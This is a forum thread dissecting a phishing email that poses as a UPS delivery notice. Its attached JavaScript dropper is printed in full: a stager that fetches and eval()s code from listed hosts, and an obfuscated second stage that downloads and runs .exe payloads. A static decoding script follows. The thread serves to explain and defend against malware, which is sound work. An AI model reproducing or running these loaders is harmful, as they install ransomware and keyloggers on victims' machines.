I have a surprise package for anyone who wants it

    I got this email message today (and it's not the first time Bob has told me about my package problems!):

    Dear Grey,


    We can not deliver your parcel arrived at April 09.


    Please review delivery label in attachment!


    Respectfully,
    Bob Archer,
    UPS Parcels Delivery Manager.
    That attachment is a zip file supposedly containing a defective label I am supposed to inspect and verify.


    Buried in it is a nice little JavaScript program. Should do wonders for your box, if you want to run it!
    Actually, I thought you might be curious as to what a JavaScript virus looks like! Can you parse the "pol.open" statement and learn which site the hacker is pulling the virus stuff from?

    Code:
    var pol = WScript.CreateObject("MSXML2.XMLHTTP");   // HTTP client via COM: this only runs under Windows Script Host (wscript/cscript), not in a browser
    var jamie = ['/','t',"",":",'p','h','S','a',"T",''];
    jamie[1+1] = "GETA";
    jamie[2] = jamie[2].substr(0, 3);                    // jamie[2] is now "GET"
    var zaher = "httpR";
    zaher = zaher.substr(0, 4);                          // zaher is now "http"
    var x = ["dev.alaw.net","3outs.com","oieosterkamp.com","musica.urbandrulabs.com","austinshortterm.com"];   // hosts tried in order until one answers
    var m = "0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0";   // campaign token: sent as the query string, then reused as a split separator below
    var gyt = 0;
    var lub = "/";
    while(true)
    {
        if(gyt>=x.length)
        {
            break;
        }        
        try
        {                
            var ghyt = false;                            // synchronous request
            var tjkh = x[gyt+0];        
            pol.open(jamie[1+1], zaher + "" + jamie[3] + lub + "" + lub + tjkh + '/counter' + '?'+m, ghyt);   // builds: GET http://<host>/counter?<m>
            pol.send();
            var r = pol.responseText;
            var rima = 500;
            var got = 50+450+rima;                       // 1000
            if ((r.length - got) > (6-6) && r.indexOf(m) > (got+1-1002))   // body longer than 1000 chars and contains the token
            {
                var amel = muhter(r, m);                 // split the body on the token...
                var jimmk = amel.join(jamie[7]+"");      // ...and re-join with "a": the server replaced every "a" with the token
                if (1 == 1)
                {
                    ataaa(jamie[9] + jimmk + jamie[9]);  // eval() the decoded second stage
                }
                break;                                   // first host that delivers wins
            };
        }
        catch(e)
        {
        };                                               // any error (host down, no response): silently try the next host
        gyt++;
    };
    function ataaa(ziyter) {eval(ziyter);}
    function muhter(kjg, lki) {return kjg.split(lki);}

    If you look carefully you can probably detect the Russian influence!
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
    – John F. Kennedy, February 26, 1962.

    #2
    So, say a non-coder like me got that attachment and found that code in it. How could I "parse" it and see what it was going to do? Is there some way to enter a section of it, like you posted, and see what it's trying to do, or unmask the website it's directing to, or what?

    VINNY
    i7 4core HT 8MB L3 2.9GHz
    16GB RAM
    Nvidia GTX 860M 4GB RAM 1152 cuda cores



      #3
      Found this: https://myonlinesecurity.co.uk/spoof...d-locky-sites/

      He seems to be keeping a running report going on the websites in the JavaScript that contain the nasties:
      alaw.net","3outs.com","oieosterkamp.com","musica.urbandrulabs.com","austinshortterm.com"

      VINNY



        #4
        The code is pretty cryptic, but the key here is the first line:
        Code:
        var pol = WScript.CreateObject("MSXML2.XMLHTTP");
        It's creating an AJAX object which will allow it to send data behind the scenes, which you can see here:
        Code:
        pol.open(jamie[1+1], zaher + "" + jamie[3] + lub + "" + lub + tjkh + '/counter' + '?'+m, ghyt);
        pol.send();
        So it's looping through the array of URLs (["dev.alaw.net","3outs.com","oieosterkamp.com","musica.urbandrulabs.com","austinshortterm.com"]) and sending each of them an AJAX request, then receiving a packet in the response. I'm not exactly sure what it's doing with the response, but probably nothing good.



          #5
          Just for fun I thought I'd see what was in the received packet. It's even more cryptic than the first script. I cleaned it up slightly for easier reading.
          Code:
          v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r woof = 'v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r ld=';
          woof += '0; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r c';
          woof += 's=Str';
          woof += 'ing.fromCh';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0rCode(9';
          woof += '2); v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r';
          woof += ' ll=["v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0k';
          woof += '.mond';
          woof += 'nr.ru';
          woof += '","de';
          woof += 'mo.urb';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndrul';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0bs.com","';
          woof += 'ecomme';
          woof += 'rce.u';
          woof += 'rb0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndr';
          woof += 'ul0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0bs.co';
          woof += 'm","homb0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0m';
          woof += 'ovie.r';
          woof += 'u","l';
          woof += 'ogo-red';
          woof += 'co.urb0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0nd';
          woof += 'rul0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0bs.co';
          woof += 'm"]; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r w';
          woof += 's=WScrip';
          woof += 't.Cre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0te';
          woof += 'Object("';
          woof += 'WScri';
          woof += 'pt.Shell';
          woof += '"); v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r fn';
          woof += '=ws.E';
          woof += 'xp0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndEnvir';
          woof += 'onmentSt';
          woof += 'rings("%T';
          woof += 'EMP%")+cs';
          woof += '+"0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0"; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r';
          woof += ' xo=WS';
          woof += 'cript.Cre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += 'teObj';
          woof += 'ect("Msxml';
          woof += '2.XMLHTTP';
          woof += '"); v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += '=WScrip';
          woof += 't.Cre';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0teObjec';
          woof += 't("ADODB.S';
          woof += 'tre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0m")';
          woof += '; v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r fo=';
          woof += 'WScript.';
          woof += 'Cre0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0teObje';
          woof += 'ct("Sc';
          woof += 'ripti';
          woof += 'ng.FileS';
          woof += 'ystemObjec';
          woof += 't"); if (!';
          woof += 'fo.FileE';
          woof += 'xists(fn+"';
          woof += '.doc"';
          woof += ')) { v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r';
          woof += ' fp=fo.Cre';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0teText';
          woof += 'File(fn+';
          woof += '".doc"';
          woof += ',true)';
          woof += '; for(v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r ';
          woof += 'i=0; i';
          woof += '<11267; i+';
          woof += '+) { fp.W';
          woof += 'rite(St';
          woof += 'ring.from';
          woof += 'Ch0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0rCode';
          woof += '(M0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0th.fl';
          woof += 'oor(M0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += 'th.r0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0ndom';
          woof += '()*64+20';
          woof += '))); }; ';
          woof += 'fp.Clo';
          woof += 'se(); try';
          woof += '{ws.Ru';
          woof += 'n(fn+".do';
          woof += 'c",1,';
          woof += '0);}c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0t';
          woof += 'ch(er';
          woof += '){}; for(v';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r n=1;n<=';
          woof += '2;n++) {';
          woof += ' for(v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += 'r i=ld;i<';
          woof += 'll.leng';
          woof += 'th;i++';
          woof += ') { v0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0r dn';
          woof += '=0; try';
          woof += ' { xo.ope';
          woof += 'n("GET';
          woof += '","http:/';
          woof += '/"+ll[i]+';
          woof += '"/count';
          woof += 'er/?"+n,';
          woof += ' f0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0lse); x';
          woof += 'o.send()';
          woof += '; if(xo.s';
          woof += 't0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tus=';
          woof += '=200) ';
          woof += '{ x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.open';
          woof += '(); x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0';
          woof += '.type=1';
          woof += '; x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.write';
          woof += '(xo.respon';
          woof += 'seBod';
          woof += 'y); if(x';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.size>';
          woof += '10000) {';
          woof += ' dn=1;';
          woof += ' x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.s0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0veT';
          woof += 'oFile(fn';
          woof += '+n+".';
          woof += 'exe",';
          woof += '2); try{';
          woof += 'ws.Run';
          woof += '(fn+n+';
          woof += '".exe';
          woof += '",1,0)';
          woof += ';}c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tc';
          woof += 'h(er){}; }';
          woof += '; x0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0.';
          woof += 'close()';
          woof += '; }; if(d';
          woof += 'n==1)';
          woof += '{ld=i;bre';
          woof += '0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0k;}; } ';
          woof += 'c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tch(';
          woof += 'er){};';
          woof += ' }; }';
          woof += '; } else ';
          woof += '{ try{ws.R';
          woof += 'un(fn+"';
          woof += '.doc",';
          woof += '1,0);}';
          woof += 'c0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0tch';
          woof += '(er){';
          woof += '}; };';
          ev0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0l(woof);
          I'm not going to spend too much time figuring this out, but some key parts:
          Creating a file system object
          Code:
          woof += 'ct("Sc';
          woof += 'ripti';
          woof += 'ng.FileS';
          woof += 'ystemObjec';
          woof += 't"); if (!';
          woof += 'fo.FileE';
          woof += 'xists(fn+"';
          woof += '.doc"';
          Using that object to attempt to write files
          Code:
          woof += '+) { fp.W';
          woof += 'rite(St';
          woof += 'ring.from';
          woof += 'Ch0000001Hmg
          Downloading more stuff
          Code:
          woof += 'n("GET';
          woof += '","http:/';
          woof += '/"+ll[i]+';
          woof += '"/count';
          woof += 'er/?"+n,';
          Trying to execute files
          Code:
          woof += 'oFile(fn';
          woof += '+n+".';
          woof += 'exe",';
          woof += '2); try{';
          woof += 'ws.Run';
          woof += '(fn+n+';
          woof += '".exe';
          woof += '",1,0)';
          Yeah, you probably don't want GreyGeek's surprise...

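The stager in post #1 and the packet in post #5 both come down to two string tricks, and both can be undone without running anything. The script below is an added example written for this thread, not code from any of the posts: it replays the pol.open() arithmetic to produce the exact request each host receives, applies the stager's own split/join "decryption" to a response body, concatenates the `woof +=` fragments the way eval(woof) would have, and reports the COM ProgIDs, second-stage hosts and Run() calls it finds. The sample body, the `.invalid` host names in it and every function name are mine (constructed for the example, not captured traffic). Run it with node.

```javascript
// Added example for this thread (not code from any of the posts): decode the
// dropper's two stages statically, i.e. without ever calling eval().
// The "response" used at the bottom is constructed here to mirror the layout
// shown in post #5; it is not traffic captured from any of the listed hosts.

const MARKER = "0000001Hmg5DfPy9Pwh65iefHfjHqx8m3cXPvWQyTXKcD-ivfCUWYKpj6LcYfTzDHjFuQc7jmBVuKYwS4halgv95JkRtSomP4AKG6GEqpSJrNIU_2qQlNQp_RugoVywv0g0";

// Stage 1: replay the arithmetic around pol.open() by hand and return the
// request each host would get. This answers the question asked in post #1.
function stageOneRequests() {
  var jamie = ['/', 't', "", ":", 'p', 'h', 'S', 'a', "T", ''];
  jamie[1 + 1] = "GETA";
  jamie[2] = jamie[2].substr(0, 3);            // "GET"
  var zaher = "httpR".substr(0, 4);            // "http"
  var lub = "/";
  var hosts = ["dev.alaw.net", "3outs.com", "oieosterkamp.com",
               "musica.urbandrulabs.com", "austinshortterm.com"];
  return hosts.map(function (h) {
    return { method: jamie[2],
             url: zaher + jamie[3] + lub + lub + h + "/counter" + "?" + MARKER,
             async: false };                   // ghyt === false: synchronous request
  });
}

// Stage 1 response check and "decryption", exactly as the stager does it:
// accept the body only if it is longer than 1000 chars and contains the marker,
// then split on the marker and re-join with jamie[7] === "a". The server swapped
// every "a" for the marker, which is why the packet in post #5 is unreadable.
function decodeStageOne(body) {
  var got = 50 + 450 + 500;                    // 1000
  if (!((body.length - got) > 0 && body.indexOf(MARKER) > -1)) return null;
  return body.split(MARKER).join("a");         // the string ataaa() would eval()
}

// Stage 2 hides its source a second way: dozens of short 'woof += ...' literals.
// Concatenate the literals ourselves instead of letting eval(woof) do it.
function reassembleWoof(decoded) {
  var re = /woof\s*\+?=\s*'((?:[^'\\]|\\.)*)'/g, out = "", m;
  while ((m = re.exec(decoded)) !== null) out += m[1];
  return out;
}

// Pull out the indicators an analyst wants from the reassembled script:
// COM objects it instantiates, second-stage hosts, and whether it runs files.
function summarize(code) {
  var progIds = [], hosts = [], m;
  var reObj = /CreateObject\("([^"]+)"\)/g;
  while ((m = reObj.exec(code)) !== null) progIds.push(m[1]);
  var reHosts = /\bll\s*=\s*\[([^\]]*)\]/.exec(code);
  if (reHosts) {
    hosts = reHosts[1].split(",").map(function (s) { return s.replace(/"/g, "").trim(); });
  }
  return {
    progIds: progIds,
    hosts: hosts,
    runCalls: (code.match(/ws\.Run\(/g) || []).length,
    writesExe: /\.exe"/.test(code)
  };
}

// Constructed stage-2 skeleton in the shape of post #5 (hosts are reserved
// .invalid names), then encoded the way the server sends it: every "a"
// replaced by the marker.
const SAMPLE_PLAIN =
  "var woof = 'var ll=[\"stage2-a.invalid\",\"stage2-b.invalid\"]; ';\n" +
  "woof += 'var ws=WScript.CreateObject(\"WScript.Shell\"); ';\n" +
  "woof += 'var xo=WScript.CreateObject(\"Msxml2.XMLHTTP\"); ';\n" +
  "woof += 'var xa=WScript.CreateObject(\"ADODB.Stream\"); ';\n" +
  "woof += 'var fo=WScript.CreateObject(\"Scripting.FileSystemObject\"); ';\n" +
  "woof += 'xa.saveToFile(fn+n+\".exe\",2); try{ws.Run(fn+n+\".exe\",1,0);}catch(er){}';\n" +
  "eval(woof);\n";
const SAMPLE_BODY = SAMPLE_PLAIN.split("a").join(MARKER);

// Full pipeline on the constructed body: stage-1 decode, stage-2 reassembly, summary.
function analyzeSample() {
  var decoded = decodeStageOne(SAMPLE_BODY);
  if (decoded === null) throw new Error("body failed the stager's own size/marker check");
  return summarize(reassembleWoof(decoded));
}

stageOneRequests().forEach(function (r) { console.log(r.method, r.url.slice(0, 60) + "..."); });
console.log(JSON.stringify(analyzeSample(), null, 2));
```

The point of doing it this way rather than pasting the sample into a console is that nothing in the attachment ever executes: the stager's "crypto" is a split/join, and the second stage's "packing" is string concatenation, so both can be reversed with the same operations the malware uses, minus the eval(). Against the real packet you would feed pol.responseText (saved to disk from a sandbox, not fetched from your workstation) to decodeStageOne() and look at the hosts and ProgIDs it reports.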


            #6
            The JavaScript I posted is a *little* more sophisticated than the ones shown in VINNY's link, because in the js in VINNY's link you can plainly see the "GET HTTP:// ...." sequence that starts off the first download of the next js script, which is run in /tmp and gets deleted when done or at reboot. Subsequent js scripts eventually pull down the payload(s), which include ransomware, keyloggers, etc. The world is full of lazy thieves.

